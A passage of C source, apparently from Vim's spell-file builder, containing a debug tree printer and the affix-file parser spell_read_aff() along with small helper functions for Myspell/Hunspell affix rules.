* For debugging the tree code: print the current tree in a (more or less)
* readable format, so that we can see what happens when adding a word and/or
* compressing the tree.
* Based on code from Olaf Seibert.
*/
#define PRINTLINESIZE 1000
#define PRINTWIDTH 6
#define PRINTSOME(l, depth, fmt, a1, a2) vim_snprintf(l + depth * PRINTWIDTH, \
PRINTLINESIZE - PRINTWIDTH * depth, fmt, a1, a2)
static char line1[PRINTLINESIZE];
static char line2[PRINTLINESIZE];
static char line3[PRINTLINESIZE];
static void
spell_clear_flags(wordnode_T *node)
{
wordnode_T *np;
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = FALSE;
spell_clear_flags(np->wn_child);
}
}
static void
spell_print_node(wordnode_T *node, int depth)
{
if (node->wn_u1.index)
{
/* Done this node before, print the reference. */
PRINTSOME(line1, depth, "(%d)", node->wn_nr, 0);
PRINTSOME(line2, depth, " ", 0, 0);
PRINTSOME(line3, depth, " ", 0, 0);
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
else
{
node->wn_u1.index = TRUE;
if (node->wn_byte != NUL)
{
if (node->wn_child != NULL)
PRINTSOME(line1, depth, " %c -> ", node->wn_byte, 0);
else
/* Cannot happen? */
PRINTSOME(line1, depth, " %c ???", node->wn_byte, 0);
}
else
PRINTSOME(line1, depth, " $ ", 0, 0);
PRINTSOME(line2, depth, "%d/%d ", node->wn_nr, node->wn_refs);
if (node->wn_sibling != NULL)
PRINTSOME(line3, depth, " | ", 0, 0);
else
PRINTSOME(line3, depth, " ", 0, 0);
if (node->wn_byte == NUL)
{
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
/* do the children */
if (node->wn_byte != NUL && node->wn_child != NULL)
spell_print_node(node->wn_child, depth + 1);
/* do the siblings */
if (node->wn_sibling != NULL)
{
/* get rid of all parent details except | */
STRCPY(line1, line3);
STRCPY(line2, line3);
spell_print_node(node->wn_sibling, depth);
}
}
}
static void
spell_print_tree(wordnode_T *root)
{
if (root != NULL)
{
/* Clear the "wn_u1.index" fields, used to remember what has been
* done. */
spell_clear_flags(root);
/* Recursively print the tree. */
spell_print_node(root, 0);
}
}
#endif /* SPELL_PRINTTREE */
/*
* Read the affix file "fname".
* Returns an afffile_T, NULL for complete failure.
*/
static afffile_T *
spell_read_aff(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
afffile_T *aff;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
#define MAXITEMCNT 30
char_u *(items[MAXITEMCNT]);
int itemcnt;
char_u *p;
int lnum = 0;
affheader_T *cur_aff = NULL;
int did_postpone_prefix = FALSE;
int aff_todo = 0;
hashtab_T *tp;
char_u *low = NULL;
char_u *fol = NULL;
char_u *upp = NULL;
int do_rep;
int do_repsal;
int do_sal;
int do_mapline;
int found_map = FALSE;
hashitem_T *hi;
int l;
int compminlen = 0; /* COMPOUNDMIN value */
int compsylmax = 0; /* COMPOUNDSYLMAX value */
int compoptions = 0; /* COMP_ flags */
int compmax = 0; /* COMPOUNDWORDMAX value */
char_u *compflags = NULL; /* COMPOUNDFLAG and COMPOUNDRULE
concatenated */
char_u *midword = NULL; /* MIDWORD value */
char_u *syllable = NULL; /* SYLLABLE value */
char_u *sofofrom = NULL; /* SOFOFROM value */
char_u *sofoto = NULL; /* SOFOTO value */
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return NULL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading affix file %s ..."), fname);
spell_message(spin, IObuff);
/* Only do REP lines when not done in another .aff file already. */
do_rep = spin->si_rep.ga_len == 0;
/* Only do REPSAL lines when not done in another .aff file already. */
do_repsal = spin->si_repsal.ga_len == 0;
/* Only do SAL lines when not done in another .aff file already. */
do_sal = spin->si_sal.ga_len == 0;
/* Only do MAP lines when not done in another .aff file already. */
do_mapline = spin->si_map.ga_len == 0;
/*
* Allocate and init the afffile_T structure.
*/
aff = (afffile_T *)getroom(spin, sizeof(afffile_T), TRUE);
if (aff == NULL)
{
fclose(fd);
return NULL;
}
hash_init(&aff->af_pref);
hash_init(&aff->af_suff);
hash_init(&aff->af_comp);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Convert from "SET" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
/* Split the line up into whitespace-separated items. Put a NUL after each
* item. */
itemcnt = 0;
for (p = line; ; )
{
while (*p != NUL && *p <= ' ') /* skip white space and CR/NL */
++p;
if (*p == NUL)
break;
if (itemcnt == MAXITEMCNT) /* too many items */
break;
items[itemcnt++] = p;
/* A few items have an arbitrary text argument, don't split them. */
if (itemcnt == 2 && spell_info_item(items[0]))
while (*p >= ' ' || *p == TAB) /* skip until CR/NL */
++p;
else
while (*p > ' ') /* skip until white space or CR/NL */
++p;
if (*p == NUL)
break;
*p++ = NUL;
}
/* Handle non-empty lines. */
if (itemcnt > 0)
{
if (is_aff_rule(items, itemcnt, "SET", 2) && aff->af_enc == NULL)
{
#ifdef FEAT_MBYTE
/* Setup for conversion from "ENC" to 'encoding'. */
aff->af_enc = enc_canonize(items[1]);
if (aff->af_enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, aff->af_enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, aff->af_enc, p_enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
else if (is_aff_rule(items, itemcnt, "FLAG", 2)
&& aff->af_flagtype == AFT_CHAR)
{
if (STRCMP(items[1], "long") == 0)
aff->af_flagtype = AFT_LONG;
else if (STRCMP(items[1], "num") == 0)
aff->af_flagtype = AFT_NUM;
else if (STRCMP(items[1], "caplong") == 0)
aff->af_flagtype = AFT_CAPLONG;
else
smsg((char_u *)_("Invalid value for FLAG in %s line %d: %s"),
fname, lnum, items[1]);
if (aff->af_rare != 0
|| aff->af_keepcase != 0
|| aff->af_bad != 0
|| aff->af_needaffix != 0
|| aff->af_circumfix != 0
|| aff->af_needcomp != 0
|| aff->af_comproot != 0
|| aff->af_nosuggest != 0
|| compflags != NULL
|| aff->af_suff.ht_used > 0
|| aff->af_pref.ht_used > 0)
smsg((char_u *)_("FLAG after using flags in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (spell_info_item(items[0]))
{
p = (char_u *)getroom(spin,
(spin->si_info == NULL ? 0 : STRLEN(spin->si_info))
+ STRLEN(items[0])
+ STRLEN(items[1]) + 3, FALSE);
if (p != NULL)
{
if (spin->si_info != NULL)
{
STRCPY(p, spin->si_info);
STRCAT(p, "\n");
}
STRCAT(p, items[0]);
STRCAT(p, " ");
STRCAT(p, items[1]);
spin->si_info = p;
}
}
else if (is_aff_rule(items, itemcnt, "MIDWORD", 2)
&& midword == NULL)
{
midword = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "TRY", 2))
{
/* ignored, we look in the tree for what chars may appear */
}
/* TODO: remove "RAR" later */
else if ((is_aff_rule(items, itemcnt, "RAR", 2)
|| is_aff_rule(items, itemcnt, "RARE", 2))
&& aff->af_rare == 0)
{
aff->af_rare = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
/* TODO: remove "KEP" later */
else if ((is_aff_rule(items, itemcnt, "KEP", 2)
|| is_aff_rule(items, itemcnt, "KEEPCASE", 2))
&& aff->af_keepcase == 0)
{
aff->af_keepcase = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "BAD", 2)
|| is_aff_rule(items, itemcnt, "FORBIDDENWORD", 2))
&& aff->af_bad == 0)
{
aff->af_bad = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NEEDAFFIX", 2)
&& aff->af_needaffix == 0)
{
aff->af_needaffix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "CIRCUMFIX", 2)
&& aff->af_circumfix == 0)
{
aff->af_circumfix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NOSUGGEST", 2)
&& aff->af_nosuggest == 0)
{
aff->af_nosuggest = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "NEEDCOMPOUND", 2)
|| is_aff_rule(items, itemcnt, "ONLYINCOMPOUND", 2))
&& aff->af_needcomp == 0)
{
aff->af_needcomp = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDROOT", 2)
&& aff->af_comproot == 0)
{
aff->af_comproot = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFORBIDFLAG", 2)
&& aff->af_compforbid == 0)
{
aff->af_compforbid = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDFORBIDFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDPERMITFLAG", 2)
&& aff->af_comppermit == 0)
{
aff->af_comppermit = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDPERMITFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFLAG", 2)
&& compflags == NULL)
{
/* Turn flag "c" into COMPOUNDRULE compatible string "c+",
* "Na" into "Na+", "1234" into "1234+". */
p = getroom(spin, STRLEN(items[1]) + 2, FALSE);
if (p != NULL)
{
STRCPY(p, items[1]);
STRCAT(p, "+");
compflags = p;
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULES", 2))
{
/* We don't use the count, but do check that it's a number and
* not COMPOUNDRULE mistyped. */
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong COMPOUNDRULES value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULE", 2))
{
/* Don't use the first rule if it is a number. */
if (compflags != NULL || *skipdigits(items[1]) != NUL)
{
/* Concatenate this string to previously defined ones,
* using a slash to separate them. */
l = (int)STRLEN(items[1]) + 1;
if (compflags != NULL)
l += (int)STRLEN(compflags) + 1;
p = getroom(spin, l, FALSE);
if (p != NULL)
{
if (compflags != NULL)
{
STRCPY(p, compflags);
STRCAT(p, "/");
}
STRCAT(p, items[1]);
compflags = p;
}
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDWORDMAX", 2)
&& compmax == 0)
{
compmax = atoi((char *)items[1]);
if (compmax == 0)
smsg((char_u *)_("Wrong COMPOUNDWORDMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDMIN", 2)
&& compminlen == 0)
{
compminlen = atoi((char *)items[1]);
if (compminlen == 0)
smsg((char_u *)_("Wrong COMPOUNDMIN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDSYLMAX", 2)
&& compsylmax == 0)
{
compsylmax = atoi((char *)items[1]);
if (compsylmax == 0)
smsg((char_u *)_("Wrong COMPOUNDSYLMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDDUP", 1))
{
compoptions |= COMP_CHECKDUP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDREP", 1))
{
compoptions |= COMP_CHECKREP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDCASE", 1))
{
compoptions |= COMP_CHECKCASE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDTRIPLE", 1))
{
compoptions |= COMP_CHECKTRIPLE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 2))
{
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong CHECKCOMPOUNDPATTERN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 3))
{
garray_T *gap = &spin->si_comppat;
int i;
/* Only add the couple if it isn't already there. */
for (i = 0; i < gap->ga_len - 1; i += 2)
if (STRCMP(((char_u **)(gap->ga_data))[i], items[1]) == 0
&& STRCMP(((char_u **)(gap->ga_data))[i + 1],
items[2]) == 0)
break;
if (i >= gap->ga_len && ga_grow(gap, 2) == OK)
{
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[1]);
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SYLLABLE", 2)
&& syllable == NULL)
{
syllable = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "NOBREAK", 1))
{
spin->si_nobreak = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSPLITSUGS", 1))
{
spin->si_nosplitsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOCOMPOUNDSUGS", 1))
{
spin->si_nocompoundsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSUGFILE", 1))
{
spin->si_nosugfile = TRUE;
}
else if (is_aff_rule(items, itemcnt, "PFXPOSTPONE", 1))
{
aff->af_pfxpostpone = TRUE;
}
else if (is_aff_rule(items, itemcnt, "IGNOREEXTRA", 1))
{
aff->af_ignoreextra = TRUE;
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo == 0
&& itemcnt >= 4)
{
int lasti = 4;
char_u key[AH_KEY_LEN];
if (*items[0] == 'P')
tp = &aff->af_pref;
else
tp = &aff->af_suff;
/* Myspell allows the same affix name to be used multiple
* times. The affix files that do this have an undocumented
* "S" flag on all but the last block, thus we check for that
* and store it in ah_follows. */
vim_strncpy(key, items[1], AH_KEY_LEN - 1);
hi = hash_find(tp, key);
if (!HASHITEM_EMPTY(hi))
{
cur_aff = HI2AH(hi);
if (cur_aff->ah_combine != (*items[2] == 'Y'))
smsg((char_u *)_("Different combining flag in continued affix block in %s line %d: %s"),
fname, lnum, items[1]);
if (!cur_aff->ah_follows)
smsg((char_u *)_("Duplicate affix in %s line %d: %s"),
fname, lnum, items[1]);
}
else
{
/* New affix letter. */
cur_aff = (affheader_T *)getroom(spin,
sizeof(affheader_T), TRUE);
if (cur_aff == NULL)
break;
cur_aff->ah_flag = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (cur_aff->ah_flag == 0 || STRLEN(items[1]) >= AH_KEY_LEN)
break;
if (cur_aff->ah_flag == aff->af_bad
|| cur_aff->ah_flag == aff->af_rare
|| cur_aff->ah_flag == aff->af_keepcase
|| cur_aff->ah_flag == aff->af_needaffix
|| cur_aff->ah_flag == aff->af_circumfix
|| cur_aff->ah_flag == aff->af_nosuggest
|| cur_aff->ah_flag == aff->af_needcomp
|| cur_aff->ah_flag == aff->af_comproot)
smsg((char_u *)_("Affix also used for BAD/RARE/KEEPCASE/NEEDAFFIX/NEEDCOMPOUND/NOSUGGEST in %s line %d: %s"),
fname, lnum, items[1]);
STRCPY(cur_aff->ah_key, items[1]);
hash_add(tp, cur_aff->ah_key);
cur_aff->ah_combine = (*items[2] == 'Y');
}
/* Check for the "S" flag, which apparently means that another
* block with the same affix name is following. */
if (itemcnt > lasti && STRCMP(items[lasti], "S") == 0)
{
++lasti;
cur_aff->ah_follows = TRUE;
}
else
cur_aff->ah_follows = FALSE;
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter. */
if (itemcnt > lasti && *items[lasti] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
if (STRCMP(items[2], "Y") != 0 && STRCMP(items[2], "N") != 0)
smsg((char_u *)_("Expected Y or N in %s line %d: %s"),
fname, lnum, items[2]);
if (*items[0] == 'P' && aff->af_pfxpostpone)
{
if (cur_aff->ah_newID == 0)
{
/* Use a new number in the .spl file later, to be able
* to handle multiple .aff files. */
check_renumber(spin);
cur_aff->ah_newID = ++spin->si_newprefID;
/* We only really use ah_newID if the prefix is
* postponed. We know that only after handling all
* the items. */
did_postpone_prefix = FALSE;
}
else
/* Did use the ID in a previous block. */
did_postpone_prefix = TRUE;
}
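/* items[3] is the number of affix entries that should follow this
 * header line. */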
aff_todo = atoi((char *)items[3]);
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo > 0
&& STRCMP(cur_aff->ah_key, items[1]) == 0
&& itemcnt >= 5)
{
affentry_T *aff_entry;
int upper = FALSE;
int lasti = 5;
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter,
* unless IGNOREEXTRA is used. Hunspell uses a "-" item. */
if (itemcnt > lasti
&& !aff->af_ignoreextra
&& *items[lasti] != '#'
&& (STRCMP(items[lasti], "-") != 0
|| itemcnt != lasti + 1))
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
/* New item for an affix letter. */
--aff_todo;
aff_entry = (affentry_T *)getroom(spin,
sizeof(affentry_T), TRUE);
if (aff_entry == NULL)
break;
if (STRCMP(items[2], "0") != 0)
aff_entry->ae_chop = getroom_save(spin, items[2]);
if (STRCMP(items[3], "0") != 0)
{
aff_entry->ae_add = getroom_save(spin, items[3]);
/* Recognize flags on the affix: abcd/XYZ */
aff_entry->ae_flags = vim_strchr(aff_entry->ae_add, '/');
if (aff_entry->ae_flags != NULL)
{
*aff_entry->ae_flags++ = NUL;
aff_process_flags(aff, aff_entry);
}
}
/* Don't use an affix entry with non-ASCII characters when
* "spin->si_ascii" is TRUE. */
if (!spin->si_ascii || !(has_non_ascii(aff_entry->ae_chop)
|| has_non_ascii(aff_entry->ae_add)))
{
aff_entry->ae_next = cur_aff->ah_first;
cur_aff->ah_first = aff_entry;
if (STRCMP(items[4], ".") != 0)
{
char_u buf[MAXLINELEN];
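/* Compile the condition into a regexp, anchored at the start of the
 * word for a prefix ("^cond") and at the end for a suffix ("cond$"). */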
aff_entry->ae_cond = getroom_save(spin, items[4]);
if (*items[0] == 'P')
sprintf((char *)buf, "^%s", items[4]);
else
sprintf((char *)buf, "%s$", items[4]);
aff_entry->ae_prog = vim_regcomp(buf,
RE_MAGIC + RE_STRING + RE_STRICT);
if (aff_entry->ae_prog == NULL)
smsg((char_u *)_("Broken condition in %s line %d: %s"),
fname, lnum, items[4]);
}
/* For postponed prefixes we need an entry in si_prefcond
* for the condition. Use an existing one if possible.
* Can't be done for an affix with flags, ignoring
* COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG. */
if (*items[0] == 'P' && aff->af_pfxpostpone
&& aff_entry->ae_flags == NULL)
{
/* When the chop string is one lower-case letter and
* the add string ends in the upper-case letter we set
* the "upper" flag, clear "ae_chop" and remove the
* letters from "ae_add". The condition must either
* be empty or start with the same letter. */
if (aff_entry->ae_chop != NULL
&& aff_entry->ae_add != NULL
#ifdef FEAT_MBYTE
&& aff_entry->ae_chop[(*mb_ptr2len)(
aff_entry->ae_chop)] == NUL
#else
&& aff_entry->ae_chop[1] == NUL
#endif
)
{
int c, c_up;
c = PTR2CHAR(aff_entry->ae_chop);
c_up = SPELL_TOUPPER(c);
if (c_up != c
&& (aff_entry->ae_cond == NULL
|| PTR2CHAR(aff_entry->ae_cond) == c))
{
p = aff_entry->ae_add
+ STRLEN(aff_entry->ae_add);
mb_ptr_back(aff_entry->ae_add, p);
if (PTR2CHAR(p) == c_up)
{
upper = TRUE;
aff_entry->ae_chop = NULL;
*p = NUL;
/* The condition is matched with the
* actual word, thus must check for the
* upper-case letter. */
if (aff_entry->ae_cond != NULL)
{
char_u buf[MAXLINELEN];
#ifdef FEAT_MBYTE
if (has_mbyte)
{
onecap_copy(items[4], buf, TRUE);
aff_entry->ae_cond = getroom_save(
spin, buf);
}
else
#endif
*aff_entry->ae_cond = c_up;
if (aff_entry->ae_cond != NULL)
{
sprintf((char *)buf, "^%s",
aff_entry->ae_cond);
vim_regfree(aff_entry->ae_prog);
aff_entry->ae_prog = vim_regcomp(
buf, RE_MAGIC + RE_STRING);
}
}
}
}
}
if (aff_entry->ae_chop == NULL
&& aff_entry->ae_flags == NULL)
{
int idx;
char_u **pp;
int n;
/* Find a previously used condition. */
for (idx = spin->si_prefcond.ga_len - 1; idx >= 0;
--idx)
{
p = ((char_u **)spin->si_prefcond.ga_data)[idx];
if (str_equal(p, aff_entry->ae_cond))
break;
}
if (idx < 0 && ga_grow(&spin->si_prefcond, 1) == OK)
{
/* Not found, add a new condition. */
idx = spin->si_prefcond.ga_len++;
pp = ((char_u **)spin->si_prefcond.ga_data)
+ idx;
if (aff_entry->ae_cond == NULL)
*pp = NULL;
else
*pp = getroom_save(spin,
aff_entry->ae_cond);
}
/* Add the prefix to the prefix tree. */
if (aff_entry->ae_add == NULL)
p = (char_u *)"";
else
p = aff_entry->ae_add;
/* PFX_FLAGS is a negative number, so that
* tree_add_word() knows this is the prefix tree. */
n = PFX_FLAGS;
if (!cur_aff->ah_combine)
n |= WFP_NC;
if (upper)
n |= WFP_UP;
if (aff_entry->ae_comppermit)
n |= WFP_COMPPERMIT;
if (aff_entry->ae_compforbid)
n |= WFP_COMPFORBID;
tree_add_word(spin, p, spin->si_prefroot, n,
idx, cur_aff->ah_newID);
did_postpone_prefix = TRUE;
}
/* Didn't actually use ah_newID, backup si_newprefID. */
if (aff_todo == 0 && !did_postpone_prefix)
{
--spin->si_newprefID;
cur_aff->ah_newID = 0;
}
}
}
}
else if (is_aff_rule(items, itemcnt, "FOL", 2) && fol == NULL)
{
fol = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "LOW", 2) && low == NULL)
{
low = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "UPP", 2) && upp == NULL)
{
upp = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "REP", 2)
|| is_aff_rule(items, itemcnt, "REPSAL", 2))
{
/* Ignore REP/REPSAL count. */
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected REP(SAL) count in %s line %d"),
fname, lnum);
}
else if ((STRCMP(items[0], "REP") == 0
|| STRCMP(items[0], "REPSAL") == 0)
&& itemcnt >= 3)
{
/* REP/REPSAL item */
/* Myspell ignores extra arguments, we require it starts with
* # to detect mistakes. */
if (itemcnt > 3 && items[3][0] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[3]);
if (items[0][3] == 'S' ? do_repsal : do_rep)
{
/* Replace underscore with space (can't include a space
* directly). */
for (p = items[1]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
for (p = items[2]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
add_fromto(spin, items[0][3] == 'S'
? &spin->si_repsal
: &spin->si_rep, items[1], items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "MAP", 2))
{
/* MAP item or count */
if (!found_map)
{
/* First line contains the count. */
found_map = TRUE;
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected MAP count in %s line %d"),
fname, lnum);
}
else if (do_mapline)
{
int c;
/* Check that every character appears only once. */
for (p = items[1]; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
if ((spin->si_map.ga_len > 0
&& vim_strchr(spin->si_map.ga_data, c)
!= NULL)
|| vim_strchr(p, c) != NULL)
smsg((char_u *)_("Duplicate character in MAP in %s line %d"),
fname, lnum);
}
/* We simply concatenate all the MAP strings, separated by
* slashes. */
ga_concat(&spin->si_map, items[1]);
ga_append(&spin->si_map, '/');
}
}
/* Accept "SAL from to" and "SAL from to #comment". */
else if (is_aff_rule(items, itemcnt, "SAL", 3))
{
if (do_sal)
{
/* SAL item (sounds-a-like)
* Either one of the known keys or a from-to pair. */
if (STRCMP(items[1], "followup") == 0)
spin->si_followup = sal_to_bool(items[2]);
else if (STRCMP(items[1], "collapse_result") == 0)
spin->si_collapse = sal_to_bool(items[2]);
else if (STRCMP(items[1], "remove_accents") == 0)
spin->si_rem_accents = sal_to_bool(items[2]);
else
/* when "to" is "_" it means empty */
add_fromto(spin, &spin->si_sal, items[1],
STRCMP(items[2], "_") == 0 ? (char_u *)""
: items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SOFOFROM", 2)
&& sofofrom == NULL)
{
sofofrom = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "SOFOTO", 2)
&& sofoto == NULL)
{
sofoto = getroom_save(spin, items[1]);
}
else if (STRCMP(items[0], "COMMON") == 0)
{
int i;
for (i = 1; i < itemcnt; ++i)
{
if (HASHITEM_EMPTY(hash_find(&spin->si_commonwords,
items[i])))
{
p = vim_strsave(items[i]);
if (p == NULL)
break;
hash_add(&spin->si_commonwords, p);
}
}
}
else
smsg((char_u *)_("Unrecognized or duplicate item in %s line %d: %s"),
fname, lnum, items[0]);
}
}
if (fol != NULL || low != NULL || upp != NULL)
{
if (spin->si_clear_chartab)
{
/* Clear the char type tables, don't want to use any of the
* currently used spell properties. */
init_spell_chartab();
spin->si_clear_chartab = FALSE;
}
/*
* Don't write a word table for an ASCII file, so that we don't check
* for conflicts with a word table that matches 'encoding'.
* Don't write one for utf-8 either, we use utf_*() and
* mb_get_class(), the list of chars in the file will be incomplete.
*/
if (!spin->si_ascii
#ifdef FEAT_MBYTE
&& !enc_utf8
#endif
)
{
if (fol == NULL || low == NULL || upp == NULL)
smsg((char_u *)_("Missing FOL/LOW/UPP line in %s"), fname);
else
(void)set_spell_chartab(fol, low, upp);
}
vim_free(fol);
vim_free(low);
vim_free(upp);
}
/* Use compound specifications of the .aff file for the spell info. */
if (compmax != 0)
{
aff_check_number(spin->si_compmax, compmax, "COMPOUNDWORDMAX");
spin->si_compmax = compmax;
}
if (compminlen != 0)
{
aff_check_number(spin->si_compminlen, compminlen, "COMPOUNDMIN");
spin->si_compminlen = compminlen;
}
if (compsylmax != 0)
{
if (syllable == NULL)
smsg((char_u *)_("COMPOUNDSYLMAX used without SYLLABLE"));
aff_check_number(spin->si_compsylmax, compsylmax, "COMPOUNDSYLMAX");
spin->si_compsylmax = compsylmax;
}
if (compoptions != 0)
{
aff_check_number(spin->si_compoptions, compoptions, "COMPOUND options");
spin->si_compoptions |= compoptions;
}
if (compflags != NULL)
process_compflags(spin, aff, compflags);
/* Check that we didn't use too many renumbered flags. */
if (spin->si_newcompID < spin->si_newprefID)
{
if (spin->si_newcompID == 127 || spin->si_newcompID == 255)
MSG(_("Too many postponed prefixes"));
else if (spin->si_newprefID == 0 || spin->si_newprefID == 127)
MSG(_("Too many compound flags"));
else
MSG(_("Too many postponed prefixes and/or compound flags"));
}
if (syllable != NULL)
{
aff_check_string(spin->si_syllable, syllable, "SYLLABLE");
spin->si_syllable = syllable;
}
if (sofofrom != NULL || sofoto != NULL)
{
if (sofofrom == NULL || sofoto == NULL)
smsg((char_u *)_("Missing SOFO%s line in %s"),
sofofrom == NULL ? "FROM" : "TO", fname);
else if (spin->si_sal.ga_len > 0)
smsg((char_u *)_("Both SAL and SOFO lines in %s"), fname);
else
{
aff_check_string(spin->si_sofofr, sofofrom, "SOFOFROM");
aff_check_string(spin->si_sofoto, sofoto, "SOFOTO");
spin->si_sofofr = sofofrom;
spin->si_sofoto = sofoto;
}
}
if (midword != NULL)
{
aff_check_string(spin->si_midword, midword, "MIDWORD");
spin->si_midword = midword;
}
vim_free(pc);
fclose(fd);
return aff;
}
/*
* Return TRUE when items[0] equals "rulename" and there are exactly "mincount"
* items, or when a comment follows right after item "mincount".
*/
static int
is_aff_rule(
char_u **items,
int itemcnt,
char *rulename,
int mincount)
{
return (STRCMP(items[0], rulename) == 0
&& (itemcnt == mincount
|| (itemcnt > mincount && items[mincount][0] == '#')));
}
/*
* For affix "entry" move COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG from
* ae_flags to ae_comppermit and ae_compforbid.
*/
static void
aff_process_flags(afffile_T *affile, affentry_T *entry)
{
char_u *p;
char_u *prevp;
unsigned flag;
if (entry->ae_flags != NULL
&& (affile->af_compforbid != 0 || affile->af_comppermit != 0))
{
for (p = entry->ae_flags; *p != NUL; )
{
prevp = p;
flag = get_affitem(affile->af_flagtype, &p);
if (flag == affile->af_comppermit || flag == affile->af_compforbid)
{
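/* Remove the flag from "ae_flags" and remember it in the entry
 * itself instead. */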
STRMOVE(prevp, p);
p = prevp;
if (flag == affile->af_comppermit)
entry->ae_comppermit = TRUE;
else
entry->ae_compforbid = TRUE;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
if (*entry->ae_flags == NUL)
entry->ae_flags = NULL; /* nothing left */
}
}
/*
* Return TRUE if "s" is the name of an info item in the affix file.
*/
static int
spell_info_item(char_u *s)
{
return STRCMP(s, "NAME") == 0
|| STRCMP(s, "HOME") == 0
|| STRCMP(s, "VERSION") == 0
|| STRCMP(s, "AUTHOR") == 0
|| STRCMP(s, "EMAIL") == 0
|| STRCMP(s, "COPYRIGHT") == 0;
}
/*
* Turn an affix flag name into a number, according to the FLAG type.
* Returns zero for failure.
*/
static unsigned
